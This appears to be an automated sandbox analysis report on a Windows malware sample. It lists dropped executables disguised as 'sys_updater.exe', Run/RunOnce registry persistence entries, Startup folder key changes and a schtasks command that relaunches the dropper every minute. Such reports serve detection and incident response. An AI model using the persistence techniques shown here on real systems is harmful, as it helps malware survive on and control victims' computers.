                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe.4.dr Static PE information: real checksum: 0x0 should be: 0xb070f
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe.4.dr Static PE information: section name: _RDATA
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe Code function: 0_2_005F1154 push ecx; ret 0_2_005F1167
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe Code function: 3_2_00551154 push ecx; ret 3_2_00551167
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe Code function: 10_2_6C793804 push ecx; ret 10_2_6C793817
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe Code function: 10_2_017B2155 pushfd ; retf 10_2_017B215B
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe Code function: 10_2_017B1E8B push 8BD08B01h; retf 10_2_017B1E92
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_06F5B45A push es; ret 12_2_06F5B4C4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_06F5B420 push es; ret 12_2_06F5B4C4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_06F5B520 push es; ret 12_2_06F5B4C4
                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe.4.dr Static PE information: section name: .text entropy: 6.934918450957892
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe File created: C:\Users\user\AppData\Roaming\S11E1iMt\caXZVqEB\FssOp8yZ\sys_updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe File created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe File created: C:\Users\user\AppData\Roaming\7XRpz47Z\MWQSQZoG\LJi5CxaZ\sys_updater.exe
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe File created: C:\Users\user\AppData\Roaming\Cth3XJqK\Us7ocUFg\nChXmDXJ\sys_updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe File created: C:\Users\user\AppData\Roaming\d3d9.dll
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe File created: C:\Users\user\AppData\Roaming\SgJvWIOT\k0mHyoU4\FomDFzEQ\sys_updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exe File created: C:\Users\user\AppData\Roaming\3TywDL8i\9iCHA8GK\9QRXpsuI\sys_updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe File created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exe File created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe File created: C:\Users\user\AppData\Local\Temp\gtxkvh.exe
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe File created: C:\Users\user\AppData\Roaming\EOcU1eIO\NvT1HrT7\PNkb0PCV\sys_updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe File created: C:\Users\user\AppData\Roaming\zRu1BqA0\k45TZ53Y\Caz9ZOq9\sys_updater.exe
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe File created: C:\Users\user\AppData\Roaming\Soso0bnK\laHUjL9Z\wIjJoUTg\sys_updater.exe
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe File created: C:\Users\user\AppData\Roaming\4pgKLvyS\3OrNf9Ry\jVB94owI\sys_updater.exe

                            Boot Survival

                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exe  Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe  Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explert.exe
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater

                            Hooking and other Techniques for Hiding and Protection

                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F0782 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005F0782
